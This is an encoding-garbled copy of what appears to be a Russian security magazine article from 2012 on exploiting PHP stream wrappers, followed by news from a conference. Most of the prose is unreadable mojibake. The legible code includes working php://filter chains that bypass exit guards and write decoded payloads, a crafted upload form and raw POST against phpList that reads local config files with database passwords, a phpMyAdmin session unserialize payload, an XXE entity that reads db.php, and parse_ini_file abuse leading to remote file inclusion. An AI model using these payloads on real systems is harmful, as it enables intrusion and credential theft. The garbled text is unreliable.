!*@0*/1, &%8# -&*6'*+#/* #:6,$#07%4 *0 %0*55&",, -13-* <,<#/-0* *6",:*/ -& +,07 ;#870"1 string.strip_tags 1+,8#07 $-&+"4-&/(. PHP-<*+. E,/(. 5"*%0*. %5*%*6 — @0* 5"&*6",:*$,07 -13-(& %#/$*8( $ quoted-printable ;*"/,0 (RFC2045, ",:+&8 6.7), , 5*0*/ 5"#/&-#07 ;#870" convert.quoted-printable-decode. F%5*87:*$,-#& ;#870", convert.quoted-printable-decode @<$#$,8&-0-* *6",6*0<& $%&' +,--(' 5*0*<, ;1-<=#&. quoted_printable_decode(). ?0, ;1-<-=#4 *6",6,0($,&0 %0"*<1 5*%#/$*87-*, &%8# $%0"&2,&0 %#/$*8( $ <*+#"*$<& quoted-printable, 0* 5"&*6",:1&0 #' $ %#/$*8( $*%7-/#6#0-*. <*+*$*. 0,68#=(. C,5"#/&", &%8# -&*6'*+#/* 1+,8#07 $*0 0,<*. 5"*%0*. %0*55&": “; <? die; ?>\n”, 0* % 5*/*>7B ;#870", convert.base64-decode @0* /*3-* %+&8,07 %8&+1B>#/ *6",:*/:

-#& -,A#' +,--(', /&3+1 -#/# # %0*55&"*/ +*83-, %0*407 %0"*<,, $(5*8-4B>,4 "*87 :,)81A<#, 0* &%07 -, <,3+*/ A,)& +&<*+#"*-$,-#4 +*5*8-4B>,4 +8#-1 %0*55&", +* <",0-*. 2&0("&/. G0*6( 812A& 5*-407 @0*0 $,3-(. /*/&-0, %<*-%0"1#"1&/ :,)81A<1 +84 5"#&/, ?%%&",.

$confi gFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";$confi gFile .= "; fi le automatically generated or modifi ed by Piwik; you can manually override the default values in global.ini.php by redefi ning them in this fi le.\n";

E-,2,8, 1+,8#/ #: %0"*<# $configFile $%& %#/$*8(, -& $'*+4>#& $ ,8;,$#0 Base64, # $(2#%8#/ && +8#-1. !*812,&/ 147, :-,2#0, %",:1 -,/ -13-* 61+&0 +*6,$#07 *+#- %#/$*8. H*6,$#/ /, 5*0*/1 20* 5"# +&<*+#"*$,-## @0*0 %#/$*8 61+&0 5"*#-0&"5"&0#"*$,- <,< 111111 # < -&/1 %5&"&+# +*6,$#0%4 &>& +$, 6#0,, 0* &%07 ASCII-<*+ 5*%8&+-&)* %#/$*8, 5*%8& +&<*+#"*$,-#4 61+&0 8#6* 63, 8#6* 127, 8#6* 191, 8#6* 255, 5*@0*/1 5*812#0%4 %#/$*8 -& #: ,8;,$#0, # 5"# %8&+1B->&/ 5"#/&-&-## base64_decode *- 61+&0 5"*#)-*"#"*$,-. F0,<, 5"# =#<8#2&%<*/ $(5*8-&-## +&.%0$#.: 5*+%2#0($,&/ +8#-1, +*6,$84-&/ -&*6'*+#/(& %#/$*8(, +&<*+#/, *2#>,&/ %0"*<1 *0 %#/$*8*$, -& $'*+4>#' $ ,8;,$#0, %-*$, 5*+%2#0($,&/ +8#-1 # 0,< +,8&&. I( ",-* #8# 5*:+-* 5*812#/ 51%01B %0"*<1. C, +,--*/ @0,5& $,3-* :,5*/-#07, %<*87<* +*6,$848# %#/$*8*$ 5*%8& <,3+*)* 5"#/&-&-#4 base64_decode. ?0# :-,2&-#4 1+*6-&. $%&)* '",-#07 $ /,%%#$&, $ -,-A&/ %812,& @0* 61+&0 0,<*. /,%%#$: $a[0]=1 $a[1]=0 $a[2]=1 $a[3]=3. !"# $:)84+& -, -&)* %0,-*$#0%4 4%-*, 20* :,)81A<, 61+&0 #/&07 $#+ ‘/’.$s2.$s3, )+& %0"*<# $s2 # $s3 %*%0*40 #: %#/$*8*$ ,8;,$#0, # #' +8#-( <",0-( 2&0("&/, +$*.-*& 5"#/&-&-#& base64_decode < $s2 +,%0 / # 0"*.-*& 5"#/&-&-#& base64_decode < $s3 +,&0 ///. J%8*$#& «%*%0*40 #: %#/$*8*$ ,8;,$#0,, # +8#-( <",0-( 2&0("&/» -&*6'*+#/* +84 0*)*, 20*6( +,--(&, -,'*+4>#&%4 :, :,)81A<*., +&<*+#"*$,8#%7 6&: #:/&-&-#. (13& )*$*"#8*%7, 20* 5"# Base64-+&<*+#"*$,-## %0"*<, ",:6#$,&0%4 -, 2,%0# 5* 2&0("& %#/$*8,). E0"*<1 $s2 /*3-* 5*%0"*#07 0,<: 5"#/&-4&/ base64_encode < *6-",0-*/1 %8&A1, 5*812,&/ %0"*<1 Lw==, <*0*",4 %*+&"3#0 0*87<* +$, %#/$*8, ,8;,$#0,, 5*@0*/1 +$*.-*& ",$&-%0$* $ <*-=& (==) :,/&-#/ -, g/. K*-&2-*, @0* -& &+#-%0$&--,4 :,/&-,, <*0*",4 -,/ 5*+'*-+#0, )8,$-*&, 20*6( 5*%8& 5"#/&-&-#4 base64_decode 5*812,8,%7 %0"*<,, *08#2,B>,4%4 *0 *6",0-*)* %8&A, (5&"$*-,2,87-*. %0"*<#) 0*87<* %5&=%#/$*8,/#, <*0*"(& 5"*5,+10 5"# %8&+1B>&/ +&<*+#-"*$,-##. H,8&& %-*$, @-<*+#/ # %-*$, /&-4&/ +$*.-*& ",$&-%0$* -, g/, $ #0*)& 5*812,&/ THdnLwg/. L-,8*)#2-* %0"*#0%4 %0"*<, $s3, $ -,A&/ %812,& *-, 61+&0 0,<*.: VEhrNGRnZy8/. E8&+1B>#. %<"#50 +&/*-%0"#"1&0, <,< «$(+,$8#$,&0%4» %0*55&":

$confi gFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";$confi gFile .= "; fi le automatically generated or modifi ed by Piwik; you can manually override the default values in global.ini.php by redefi ning them in this fi le.\n";

$S=$confi gFile."/THdnLwg/VEhrNGRnZy8/".base64_ encode(base64_encode(base64_encode(base64_encode(base64_encode('Yes! It Works!')))));

"-./0123 XML /45 XXE 6373. php://filter&70189-7:0;25 /011<= 6373. php://filter

!"#$%&'( #)*+&,', %-% #.'/012 php://filter

!"#$% 09 /164/ 2012 073

$content = "; <? die; ?>\n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]\n"; $fi le = 'php://fi lter/write=convert.base64-decode|convert. base64-decode|convert.base64-decode/resource=./PoC'; fi le_put_contents($fi le, $content);

3+% 4&#5 .#&+*)6*&/( *7* 0'2&% /&+#,6, $1.#-0(8768 +#-9 :';-6<,%, $ "'00#5 /-6='* 4&# )6"*& /Ly8v. >"'-%&9 4&#& ?* /&#..*+ / .#5#798 @%-9&+' string.strip_tags 5#?0# 0'50#;# .+#7*.

$content = "; <? die; ?>\n"; $content .= "=3C=3Fprint('PHP');\n"; $fi le = 'php://fi lter/write=string.strip_tags|\ convert.quoted-printable-decode/resource=./PoC'; fi le_put_contents($fi le, $content);

A"*/9 =3C, =3F — 4&# /%5$#-1 <, ? $ quoted-printable @#+5'&*. B'?0# #&5*&%&9, =&# @%-9&+ convert.quoted-printable-decode 0* "'/& #?%"'*5#;# +*:6-9&'&', */-% $ /&+#,* /#"*+?%&/( :0', +'-$*0/&$', .#/-* ,#&#+#;# 0*& <*/&0'"C'&*+%=0#;# ,#"' /%5$#-'.

$s='php://fi lter/read=convert.\quoted-printable-decode/resource=data:,dGVz=BAD';var_dump(fi le_get_contents($s)); // print: string(0) ""

3#4&#56 /&#%& +'//5#&+*&9 .#"+#)0*2 % "+6;%* ,#5)%0'C%% @%-9&+#$.

STRING.STRIP_TAGS + CONVERT.BASE64-DECODE = PROFITD-( )#-** 4@@*,&%$0#;# %/.#-9:#$'0%( @%-9&+' string.strip_tags 0*#)E#"%5# %:6=%&9 0*,#&#+1* *;# #/#)*00#/&%. B #@%-C%'-90#2 "#,65*0&'C%% 5#?0# 0'2&% 6.#5%0'0%* /-*"687*;# @',&': */-% .#/-* /%5$#-' < %"*& .+#)*-, &# /%5$#- < 0* $#/.+%-0%5'*&/( ,', 0'='-# &*;' % 6"'-(&9/( 0* )6"*&. F&# #=*09 $'?012 5#5*0&, &', ,', .+% «$1"'$-%$'0%%» $ .+*#)+':6*51E "'001E 5#;6& .#($%&9/( /%5$#-1 <, .#4&#56, .+%5*0(( , &',%5 "'0015 @%-9&+ string.strip_tags, $#:5#?0# 6"'-%&9 /+':6 "#$#-90# )#-9-<68 ='/&9 "'001E. G# $'?0# :0'&9, =&# )6"*& %0&*+.+*&%+#$'&9-/( ,', HTML-&*;. F&# -*;,# #.+*"*-%&9 / .#5#798 @'::%0;'.

for($i=0; $i<256; $i++) { $s='Hello <'.chr($i).'World > ABC'; echo $i.' -- '.chr($i).' -- '.strip_ tags($s)."\n";}

3#/-* :'.6/,' 4&#;# /,+%.&' /&'0#$%&/( (/0#, =&# */-% .#/-* /%5$#-' < %"6& /%5$#-1 / ASCII-,#"'5% {9,10,11,12,13,32}, &# :0', < 0* $#/.+%0%5'*&/( ,', 0'='-# &*;'. H7* #"%0 $'?012 5#5*0& — 0'-%=%* ,'$1=*, $06&+% &*;#$. H/-% &*; /#"*+?%& -%<088 (0*:',+1&68) ,'$1=,6 (‘ %-% “), &# #)+*:'*&/( $/* .#/-* 0**. I&+#,' 5*?"6 ,'$1=,'5% $#/.+%0%5'*&/( ,', '&+%)6& &*;' % .#4&#56 %;0#+%+6*&/( .#-0#/&98.

echo strip_tags('Hello <<Wor"ld>U=b >> ABC'); # print: Helloecho strip_tags('Hello <<Wor"ld>U=b >"> ABC'); # print: Hello ABCecho strip_tags('Hello <<Wor"ld>U=b ><"> ABC'); # print: Hello ABC

3+% 4&#5 strip_tags %;0#+%+6*& 4,+'0%+#$'0%* ,'$1=*, [#45599] (bit.ly/MPqcYX).

!"#!$ %&!'(&)* +, !-+!'( GETIMAGESIZEI .#5#798 @%-9&+#$ 5#?0# 6"'-(&9 0* &#-9,# /&#..*+1. J#?0#, 0'.+%5*+, 5#"%@%C%+#$'&9 /#"*+?%5#* %:#)+'?*0%(, .#/-* &#;#

,', #0# .+#<-# .+#$*+,6 0' #/0#$* @60,C%% getimagesize. B ,'=*-/&$* .+%5*+' +'//5#&+%5 /,+%.&, $ ,#&#+#5 .+%/6&/&$68& &',%* 6='/&,% ,#"':

extract($_REQUEST); ..................include $templatedir.'/header.html'; ..................if(!empty($_FILES) ) { $fi le_info = getimagesize($_FILES['image']['tmp_name']); if($fi le_info['mime'] == 'image/jpeg'){ if(move_uploaded_fi le($_FILES['image']\ ['tmp_name'], $folder.'/avatar.jpg')).................

3+% #&/6&/&$%% NULL-)'2&' 5#?*& .#,':'&9/(, =&# 0*& $#:-5#?0#/&% 0% .+#4,/.-6'&%+#$'&9 RFI, 0% :';+6:%&9 =&#-&#, ,+#5* @'2-' avatar.jpg. G# $+'..*+1 .+*"#/&'$-(8& 0'5 0#$1* /.#/#)1 4,/.-6'&'C%% .#"#)0#;# +#"' 6(:$%5#/&*2.1. ' EXIF-./0123456.5 7658295: 8366;5 7 6501<08.:0: =02:3>5

% :';+6?'*5 4&# %:#)+'?*0%*, #.+*"*-%$ .*+*5*0068 $folder &',%5 #)+':#5:

folder=php://fi lter/write=string.strip_tags|convert.base64-decode/resource=/tmp/

3#/-* .+#E#?"*0%( .+#$*+,% getimagesize, 0# .*+*" /#E+'-0*0%*5 0' "%/, %:#)+'?*0%* )6"*& #)+')#&'0# @%-9&+'5% % .+*$+'&%&/( $ zip-'+E%$.

2. *6?@A8.: =3B@ 76C>2. D>0E0 zip-32<.73. D-( 4&#;# %/.#-9:6-*5 $+'..*+ zip. K#-** .#"+#)0# #) *;# %/.#-9:#$'0%% ( +'//,'-:'- $ .+*"1"67*2 /&'&9* (/&'&9( «!"#$%&'( #)*+&,'», '$;6/& 2012 ;#"').

templatedir=zip:///tmp/avatar.jpg#/my

I .#5#798 @%-9&+#$ 5#?0# 0* &#-9,# «$1"'$-%$'&9» "'001*, 0# % .+#/&# 6"'-(&9 ='/&9 @'2-', */-% */&9 &','( 0*#)E#"%5#/&9.

LMINOLGPH LNHGOH QMRSPB B PHPLIST <= 2.10.13 T'//5#&+%5 "#$#-90# %0&*+*/068 6(:$%5#/&9 $ /,+%.&* phpList 2.10.13. 3+%=%0#2 "'00#2 6(:$%5#/&% ($-(*&/( $#:5#?0#/&9 %:-5*0(&9 /&+6,&6+6 $ 5'//%$* $_FILES. 3*+$#* 6.#5%0'0%* #) 4&#2 #/#)*00#/&% 5'//%$' $_FILES .#($%-#/9 *7* $ 2004 ;#"6 (bit.ly/PEZItl). G# %/.+'$-*0# 4&# )1-# &#-9,# $ 2012-5 (bit.ly/MOI7x1). O&',, $ phpList 2.10.13, $ @'2-* ./admin/commonlib/pages/user.php 5#?0# 0'2&% /-*"687%2 ,#":

if (is_array($_FILES)) { ## only avatars are fi les foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key];

!"#$#%&'() *()+ ,--%(-$#.'/,0 ."'!!("#. 0123' PHP - *#43, 1"(/,0 '*'3, /' .(5-!",%#&(/,0

!"#$%

&'()* 09 /164/ 2012074

if ($size < MAX_AVATAR_SIZE) { $avatar = fi le_get_contents($tmpnam); Sql_Query(sprintf(‘replace into %s (userid,attributeid,value) values(%d,% d,"%s")’, $tables["user_attribute"], $id,$key, base64_encode($avatar)));

!"#$%&'% (%')*+, ,*% -$) *%.%, ,*%/0 1#(%$+2%34*+ 5*%* 6%- -$) 24.78261 (7%123%$+'09 $%64$+'09 :4;$%3 3 /428 -4''09, -%-#*4*%,'% #%2-4*+ *468< HTML-:%7=8:

<form action="http://localhost/lists/admin/?page=user&id=1" method="POST" enctype="multipart/form-data" > <input type="fi le" name="attribute[tmp_name]["> <input type="fi le" name="attribute[size]["> <input type="fi le" name="attribute[[tmp_name]"> <input type="fi le" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"></form>

>*6703 5*8 HTML-:%7=8 3 /7482"7" 1 30/743 '"%/9%-1=0" :4;-$0, '4 8-4$"''0; #"73"7 =%&'% %*%#$4*+ #$"-8<?1; POST-24(7%# (3 (%$" Content-Type 8642034"= (8*+ -% $%64$+'%.% :4;$4):

POSTDATA =-----------------------------277443277232757Content-Disposition: form-data; name="attribute[tmp_name]["; fi lename="image.jpg"Content-Type: /path/to/local/fi le.php

-----------------------------277443277232757Content-Disposition: form-data; name="attribute[size]["; fi lename="1"Content-Type: application/octet-stream

-----------------------------277443277232757Content-Disposition: form-data; name="attribute[[tmp_name]"; fi lename="1"Content-Type: application/octet-stream

-----------------------------277443277232757Content-Disposition: form-data; name="attribute[name]["; fi lename="1"Content-Type: application/octet-stream

-----------------------------277443277232757Content-Disposition: form-data; name="change"

Save Changes-----------------------------277443277232757--

@ 7"28$+*4*" 3 =4##13" $_FILES (%)31*#) 5$"="'*

$_FILES[attribute][tmp_name][[type] = /path/to/local/fi le.php

A*%, 3 #3%< %,"7"-+, (713"-"* 6 *%=8, ,*% 3 /428 -4''09 /8-"* 24.78&"'% #%-"7&1=%" :4;$4 /path/to/local/file.php. B%#$" 3#"9 5*19 =4'1(8$)C1; %#*4'"*#) *%$+6% (%$8,1*+ -4''0" 12 #%%*-3"*#*38<?"; ),";61 # (%=%?+< SQL-1'D"6C11. B71 5*%= :4;$0 /8-8* 24.78&4*+#) 3 *4/$1C8 phplist_user_user_attribute, 3 (%$" value, 6%*%7%" 1=""* *1( varchar(255). E *%=8 &" ("7"- 24.7826%; #%-"7&1=%" :4;$4 %/74/4*034"*#) :8'6C1"; base64_encode,

,*%, (% #8*1, -4"* 3%2=%&'%#*+ #%974'1*+ 3 /428 *%$+6% 192 #1=3%$4, '% 5*% %.74'1,"'1" =%&'% %/%;*1 # (%=%?+< 374(("74 php://filter. !4(71="7, "#$1 '"%/9%-1=% 82'4*+ (47%$+ %* /420 -4''09 12 *46%.% :4;$4 (34&'%, ,*% 3 5*%= :4;$" '"* 2'46%3 743"'#*34):

/******************************************************** * The database confi gurations. * * MySQL settings - You can get this info from your web * host ********************************************************//** The name of the database */defi ne('DB_NAME', 'cms');

/** MySQL database username */defi ne('DB_USER', 'dbuser');

/** MySQL database password */defi ne('DB_PASSWORD', 's3creTp4ss');

/** MySQL hostname */defi ne('DB_HOST', 'localhost');

F%&'% %/74/%*4*+ #%-"7&1=%" :4;$4 :1$+*7%= convert.base64-decode.

php://fi lter/read=convert.base64-decode/resource=/ path/to/local/db.php

G461= %/742%= 3 /428 -4''09 (%(4-8* 8&" 255 #1=3%$%3 12 '"-%/9%-1=%.% '4= :4;$4, (71 5*%= #1=3%$0 '" 12 4$:431*4 Base64 /8-8* (7%1.'%717%34'0. H#$1 (47%$+ %* /420 -4''09 '" /8-"* #%-"7&4*+ #("C14$+'09 #1=3%$%3, =0 ".% 82'4"= (%$'%#*+<. H#$1 1#(%$+2%34*+ :1$+*7 string.strip_tags, =%&'% (%(0*4*+#) 307"24*+ ,4#*+ :4;$4, 1 *"= #4=0= 3 /428 -4''09 8&" 24.782)*#) '" ("730" 192 #1=3%$4, 4, 3%2=%&'%, 6464)-*% -78.4) ,4#*+ :4;$4. !4(71="7, =%&'% 82'4*+ $%.1' 1 (47%$+ %* /420 -4''09 12 6%':1.874C1%''%-.% :4;$4 BBPress'a *461= %/742%=:

php://fi lter/convert.base64-encode|string.rot13|convert.base64-decode|string.strip_tags|convert.base64-encode|string.rot13|convert.base64-decode/resource=/bbpress/bb-confi g.php

@HEG>IJ KGKE L*46, ,*% &" -4"* '4= (71="'"'1" :1$+*7%3 (71 8)231=%#*)9 *1(4 File Manipulation? @ ("738< %,"7"-+ (%)3$)"*#) 3%2=%&'%#*+ *74'#:%7=17%34*+ -4''0". !4(71="7, "#$1 8-4$%#+ 3'"-71*+ -4''0" 3 646%;-$1/% :4;$, '4 4*468"=%= #"73"7" =0 =%&"= # (%-=%?+< php://filter/ ".% *74'#:%7=17%34*+ 1 3 7"28$+*4*" (%$8,1*+ 8&" :4;$ # (7%123%$+'0= #%-"7&1=0=. M"= =%.8* /0*+ (%$"2'0 *46%.% 7%-4 :4;$0? H#$1 '"* 3%2=%&'%#*1 #%2-434*+ :4;$ 3 3"/-78*", =%&'% (%(7%/%34*+:1. !"#$%&' (%)* +,++--.

N%2-4'1" #"##11 -4"* 3%2=%&'%#*+ (7%123"#*1 742$1,-'0" 31-0 4*46. !4(71="7, =%&'% %/%;*1 43*%7124C1<, "#$1 3"/-(71$%&"'1" 1#(%$+28"* #"##11 -$) 43*%7124C11 (%$+2%34*"$";. G46&" =%&'% 7"4$12%34*+ unserialize bug ,"7"2 session_start(), "#$1 (71$%&"'1" #%-"7&1* 8)231=0" =4.1,"#61" ="*%-0. G8* 8="#*'% 3#(%='1*+ (7% unserialize bug, 3 #671(*" scripts/setup.php phpMyAdmin. A*4 8)231=%#*+ /0$4 1#(743$"'4 3 3"7#11 2.11.10 *"=, ,*% 12 #671(*4 scripts/setup.php /0$ 8-4$"' unserialize, (71'1=4<?1; -4''0" %* (%$+2%-34*"$), (71 5*%= 8)231=0; =4.1,"#61; ="*%- *46 1 %#*4$#) 3 6%-" phpMyAdmin. G46 646 phpMyAdmin 1#(%$+28"* #"##11, %#*4$4#+ 3%2=%&'%#*+ (7%56#($84*17%34*+ 8)231=%#*+ ="-

!"#$%&'( #)*+&,', %-% #.'/012 php://filter

!"#$% 09 /164/ 2012 075

!"#$%$%&'( )% %"*$+ "%"* ,-)'%): ,-)./-*$0" )'0)./ 120*3$4 FILE_EXISTS, IS_FILE, FILESIZE 0/ 5"52% .)',)6&!)."%&'( .-",,/-"7$ PHP://FILTER, ZIP://, DATA://, COMPRESS.ZLIB://

&#"' __wakeup / .#3#456 session_start(). 7'.+%3*+, */-% 8 .*0&*/&*+' */&5 "#/&8. $ phpMyAdmin / .+%$%-*9%*2 FILE, #0 3#:*& /#;"'&5 <'2- /*//%% (/ .#3#456 #.*+'&#+' SELECT ... INTO OUTFILE):xxx|a:1:{i:0;O:10:"PMA_Confi g":1:{s:6:"source";s:63: "ftp://myname:mypass@ftp.narod.ru/pathto/index.txt";}}

=#/-* &#9# ,', 08:012 <'2- /*//%% /#;"'0, #/&'*&/( &#-5,# #)+'&%&5/( , http://site.com/phpmyadmin/ / /##&$*&/&$86-4%3 PHPSESSID. >&#& /.#/#) )8"*& +')#&'&5 "-( $/*? $*+/%2 phpMyAdmin.2. !"#$%&' ()( *+,+#%*(-%&' .%/)"01. @/-% $*)-.+%-#:*0%* %/.#-5;8*& &*3.-A&1, &#, .*+*;'.%/1$'( %-% /#;"'$'( 0#$1* &*3.-A&1, 3#:0# %/.#-5;#$'&5 8(;$%3#/&% B')-#0%;'&#+#$.3. !"#$%&' zip-%,2(3 ( *,"45-*)6%&(,"3%&' RFI.4. !"#$%&'/*+,+#%*(-%&' 7%8)1 htaccess/htpasswd.C0#9"' )1$'*&, D&# 0*-5;( /#;"'$'&5 <'2-1 $ $*)-+8&* /+*"/&$'3% PHP, 0# 3#:0# .*+*;'.%/1$'&5 <'2-1 htaccess/htpasswd. =*+*;'.%/5 A&%? <'2-#$ .#;$#-(*&: #)?#"%&5 '$&#-+%;'E%6, $1.#-0(&5 ,#3'0"1 % "':* .#-8D'&5 %0<#+3'E%6 # ,#0<%98+'E%% /*+$*+' Apache (bit.ly/lu9CuD, bit.ly/Qm2a5x). F+#3* &+'0/<#+3'E%% <'2-#$, $+'..*+ php://filter "'*& $#;-3#:0#/&5 3'0%.8-%+#$'&5 <80,E%(3%, ,#&#+1* #)+')'&1$'6& <'2-1 &#-5,# #.+*"*-*00#9# &%.'.

GH7FIC! PARSE_INI_FILE J#9-'/0# #<%E%'-50#2 "#,83*0&'E%%, <80,E%( parse_ini_file %3*-*& /-*"864%2 /%0&',/%/:

array parse_ini_fi le ( string $fi lename [, bool $process_sections = false [,int $scanner_mode = INI_SCANNER_NORMAL ]] )

>&' <80,E%( ;'9+8:'*& ini-<'2-, 8,';'0012 $ '+983*0&* filename, % $#;$+'4'*& 0'/&+#2,% %; ini-<'2-' $ $%"* '//#E%'-&%$0#9# 3'//%$'. K', ,', $ ini-<'2-'? #)1D0# 0'?#"(&/( $':01* "-( +')#&1 $*)-.+%-#:*0%( "'001*, <80,E%( parse_ini_file 3#:*& +')#&'&5 &#-5,# / -#,'-5013% <'2-'3%, 0# .+% A&#3 $ ,'D*/&$* $filename 3#:0# %/.#-5;#$'&5 $+'..*+1. =+*".#-#:%3, D&# 8 0'/ */&5 $#;3#:0#/&5 $0*"+%&5 "'001* $ <'2- /*//%%, 0'.+%3*+, $ /,+%.&* */&5 &',#2 ,#":

session_start(); $_SESSION['admin'] = $_POST['name']; ................................$var = parse_ini_fi le($inifi le); require $var['require'];

K#9"', /#;"'$ <'2- /*//%% /tmp/sess_dffdsdf24gssdgsd90 / &',%3 /#"*+:%313:

admin|s:68:”Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5”

31 3#:*3, %/.#-5;8( <%-5&+1, .+*#)+';#$'&5 A&#& <'2- $ <#+-3'&, "#/&8.012 <80,E%% parse_ini_file:

php://fi lter/read=convert.base64-decode|convert.base64- decode|convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90

L&# $ "'00#3 /-8D'* .+%$*"*& , 8(;$%3#/&% Remote File Include.

XXE-MKMFC XML — B%+#,# +'/.+#/&+'0*0012 &*,/&#$12 <#+3'&, .+*"0'-;0'D*0012 "-( ?+'0*0%( /&+8,&8+%+#$'001? "'001?, ,#&#+1* %/.#-5;86&/( .+% #)3*0* %0<#+3'E%*2 3*:"8 .+#9+'33'3%. N#+#B# %;$*/&0#, D&# $ XML-"#,83*0& 3#:0# "#)'$-(&5 /#"*+-:%3#* $0*B0%? <'2-#$ / .#3#456 $0*B0%? /840#/&*2 (external entities), 0# .+% A&#3 %&#9#$12 "#,83*0& "#-:*0 )1&5 well-formed. O PHP #)#2&% A&# #9+'0%D*0%* 3#:0# / .#3#456 <%-5&+' convert.base64-encode.

Bypass well-formed XML output check<?xml version='1.0' standalone='yes'?><!DOCTYPE scan [ <!ENTITY xxe SYSTEM "php://fi lter/convert.base64-encode/ resource=./db.php"> ]><scan>&xxe;</scan>

7# $+'..*+1 3#:0# %/.#-5;#$'&5 0* &#-5,# $08&+% XML-"#,83*0&', 0# % $ <80,E%% simplexml_load_file % $ 3*&#"* DOMDocument::load. >&# "'*& $#;3#:0#/&5 .+#%;$*/&% XXE-'&',8 .+% allow_url_fopen =Off, */-% */&5 $#;3#:0#/&5 3'0%.8-%+#$'&5 %3*0*3 <'2-'.

PMFQRL@7C@ 7' A&#2 0#&* ( ;'$*+B'6 /$#* .#$*/&$#$'0%* #) %/.#-5;#$'0%% $+'..*+#$ "-( .#/&+#*0%( .+#"$%08&1? &*?0%, A,/.-8'&'E%% 8(;$%3#/&*2 $ $*)-.+%-#:*0%(?.

O+'..*+1 #D*05 9%),'( % <80,E%#0'-50'( B&8,', $.#-0* $#;3#:0#, D&# ( *4* $*+08/5 , 0%3 $ )8"84%? /&'&5(?. 7'.#306, D&# ;'4%&%&5/( #& .#"#)0#9# +#"' '&', "#/&'&#D0# .+#/&#: .+#$*+-,% 0' #/0#$* <80,E%2 file_exists, is_file, filesize 0* "'"8& $#/.#-5-;#$'&5/( $+'..*+'3% php://filter, zip://, data://, compress.zlib://.

=+% 8/&'0#$-*00#3 .'&D* Suhosin .# 83#-D'0%6 0*$#;3#:0# %/.#-5;#$'&5 $+'..*+1 $ %0,-6"'?, "':* */-% "%+*,&%$' allow_url_include %3**& ;0'D*0%* On. S-( %/.#-5;#$'0%( $+'..*+#$ $ &',#3 /-8D'* 0*#)?#"%3# "#)'$%&5 %? $ $'2&--%/&, 0'.+%3*+

ǮȕșȤȦȞȔ PHP Ȗ ȖȔȝȦ-ȟȜȥȦș Suhosin’Ȕsuhosin.executor.include.whitelist = "php"

K*.*+5 &1 ;0'*B5, D&# &',#* $+'..*+1 % ,', %? .+'$%-50# %/.#-5;#$'&5. =#.+#)82 $;9-(08&5 0' ;',+1&1* 8(;$%3#/&% .#-0#$#38, $#;3#:0#, %? % 0* ;',+1-%... Stay wrapped! z

WWW

9%00%: -&%&': "-0"3%0% 0% 31-&6*)+0(( ;)+5-+: <"-53(0% 0% =+>$60%,"$0"= 7",6=+ *" *,%5&(?+-5"8 /+#"*%-0"-&( Positive Hack Days 2012. @,+#+0&%A(: $"5)%$% $"-&6*0% *" 4&"=6 %$,+-6: slidesha.re/MTRkml.

!"#$%

&'()* 09 /164/ 2012076

!"#$%&'($#) (#*+) ,'-"#*. / '%$'0 0+,*+ «1&%-2#3&» & «45*-'63&» 5%#6#,.. 7 8',3/+ 1"'96# ,50#,9+%9#) (/ ,#0'0 :'"'9+0 ,0;,6+ <*'=' ,6'/#) 3'$4+"+$>&) %6) 6?%+@, 3'*'";+ 1"&-$&0#?* "+9+$&) ' /'1"',#: -+('1#,$',*& / -'6.9&: 3'01#$&):, & %6) 6?%+@, 3'*'";+ $+ 1'$#,6;93+ ($#?*, A*' *#3'+ /(6'0. B#3 <*' 1"'&,:'%&6', 3#3&+ ,?"1"&(; 1'%='*'/&6& '"=#$&(#*'"; & 3#3&+ %'36#%; $#0 ','-+$$' (#1'0$&6&,., — / <*'0 0#*+"&#6+.

PHDays 2012: !"! #$% &'(%?

!"#$" ! %!&'$($&)** +! +(,%"*#$-%!. /$0!+,-&!-"* 1 %,("*&%,2

+"/'+, A*' 1"&/6+3#6' /$&0#$&+ 3#2%'=', 3*' 1')/6)6,) $# 16'C#%3+ Positive Hack Days, — <*' '="'0+$$;@ #3/#"&50, (#/#6+$$;@ "#,1+A#*3#0& A4. «D*' <*'?» — ,1"#9&/#? )

5 '"=#$&(#*'"'/, 3'01#$&& Positive Technologies. E*' '%$' &( (#%#$&@ ="#$%&'($'=' CTF, / 3'*'"'0 5A#,*$&3#0 $52$' -5%+* 1'3#(#*. $#-/;3& '6%,356.$'=' ,1','-# %'-;A& 1'6+($'@ &$4'"0#>&&, 3'1#),. / -53/#6.$'0 ,0;,6+ / 05,'"+. F2+ , <*'=' 0'0+$*# ,*#$'/&*,) ),$', A*' 3'$4+"+$>&) -5%+* ='"#(%' -'6.9&0, A+0 ,+,,&& %'36#%'/, 1#"#6-6+6.$' &%5C&: / $+,3'6.3&: (#6#:. E*' 'C5C+$&+ 53"+16)+*,), 3'=%# '-:'%&9. $+0#6+$.35? *+""&*'"&? 3'$4+"+$>&&, — 3,*#*&, /,+ 1"'-&,:'%&6' / >+$*"+ 8',3/; $# '%$'@ &( ,#0;: 1"'%/&$5*;: 16'C#%'3 , ,&0/'6&A+,3&0 $#(/#$&+0 Digital October. G="'0$'+ 3'6&A+,*/' %+3'"#>&@, ,*+$%'/, (#*"#/'3 %6) 3'$35",'/, #*0',4+"$;@ -#" , -+,-16#*$;0 #63'='6+0, $' =6#/$'+... $+/+"')*$'+ 3'6&A+,*/' ($#3'0;: 6?%+@. B#2+*,), A*' ,'-"#*. +C+ -'6.9+ ,1+>'/ &( '-6#,*& HI 1'% '%$'@ 3";9+@ $+/'(0'2$'. J5 &6& 1' 3"#@$+@ 0+"+ 'A+$. ,6'2$'. K"',*'@ 1"&0+": 0; 1'($#3'0&6&,. ,"#(5 , $+,3'6.3&0& #/*'"#0& ][, 3'*'";: "#$.9+ ($#6& *'6.3' /&"*5#6.$'. 7 &*'=+ /,? 3'$4+"+$>&? 0; -;6& / ,',*')$&& /;-'"#: *' 6& 1''-C#*.,) , &$*+"+,$;0& 6?%.0&, *' 6& -+2#*. $# %'36#%. J' +,6& %'36#%, *' 3#3'@? D#,*' &$*+"+,$;+ /;,*516+$&) -;6& 1#"#66+6.$'. 71"'A+0, -;6# %',*51$# 1")0#) /&%+'*"#$,6)>&), A*' "+9#6' 1"'-6+05.

